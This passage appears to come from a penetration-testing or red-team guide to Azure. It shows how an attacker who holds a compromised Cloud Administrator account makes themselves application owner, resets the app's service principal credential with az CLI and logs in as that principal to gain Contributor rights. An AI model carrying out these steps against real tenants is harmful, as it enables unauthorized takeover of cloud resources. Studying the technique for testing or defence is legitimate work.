Abusing Cloud Administrator Role

In this section we'll tackle an attack scenario that sees us compromising a Cloud Administrator account and wanting to get access to an application we don't have access to. This application has a Contributor RBAC role to the subscription so we'll end up assigning ourselves access to the app, resetting its service principal account and logging in with the newly-set password.

The first step of the attack is adding ourselves as Application Owner, this can be done using the AZCli

PS /home/otter> az ad app owner add --id <application_id> <user_id>
# we can confirm the changes by listing all the owners of the application
PS /home/otter> az ad app owner list --id <application_id>

Now we can reset the password of the Service Principal account

PS /home/otter> az ad sp credential reset --id <application_id>

this command will return a JSON object of this format

{
	"appId": "<application_id>",
	"password": "<new_service_principal_password>",
	"tenant": "<tenant_id>"
}

With the SP password we are able to log into the application via single-factor log-in as the SP

PS /home/otter> az login --service-prinipal -u <application_id> -p <new_service_principal_password> --tenant <tenant_id>

The extreme summary is: once we compromise a Cloud Administrator account, we have control over all the applications in the tenant that have the Contributor RBAC role assigned to them.